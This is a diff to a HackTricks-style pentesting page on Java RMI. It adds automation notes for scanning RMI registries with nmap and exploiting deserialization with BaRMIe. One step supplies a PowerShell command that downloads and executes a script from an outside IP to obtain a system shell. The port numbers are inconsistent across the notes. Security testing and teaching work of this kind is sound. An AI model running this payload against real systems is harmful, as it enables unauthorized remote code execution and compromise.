HAC 1099

pentesting/1099-pentesting-java-rmi.md

@@ -266,3 +266,40 @@ We can still achieve arbitrary Java deserialization by replacing object or array
 
 * `port:1099 java`
 
+## HackTricks Automatic Commands
+
+```
+Protocol_Name: Java-RMI    #Protocol Abbreviation if there is one.
+Port_Number:  1098     #Comma separated if there is more than one.
+Protocol_Description: Java Remote Method Inclusion         #Protocol Abbreviation Spelled out
+
+Name: Notes
+Description: Notes for Java-RMI
+Note: """
+The Java Remote Method Invocation, or Java RMI, is a mechanism that allows an object that exists in one Java virtual machine to access and call methods that are contained in another Java virtual machine; This is basically the same thing as a remote procedure call, but in an object-oriented paradigm instead of a procedural one, which allows for communication between Java programs that are not in the same address space.
+
+nmap -sC -sV -Pn 10.11.1.73 -p 1100 
+    may dump the reg of the java-rmi instance. If this is the case the machine may be vulnerable to a deserializaion exploit.
+    BaRMIe.jar is the way to go to directly exploit this vulnerability.
+    https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01      is where the latest build is hosted, pre-built
+    
+useage
+    java -jar BaRMIe_v1.01.jar -attack 10.11.1.73 1100
+    target select)          1
+    available attacks)    1 (illegal bind deserialization)
+    payloads)                1 (Apache Common Collections 3.1 worked for me, others may also work)
+    OS Command)         powershell.exe -command "IEX(new-object net.webclient).downloadstring('http://192.168.119.167:80/3232.ps1')"
+    
+    enjoy your system shell!
+
+https://book.hacktricks.xyz/pentesting/1099-pentesting-java-rmi
+"""
+
+Name: Nmap RMI
+Description: Nmap with RMI Scripts
+Command: """nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1098 {IP}"""
+
+Name: Nmap register
+Description: Dump register of java-rmi instance
+Command: """nmap -sC -sV -Pn {IP} -p 1100"""
+```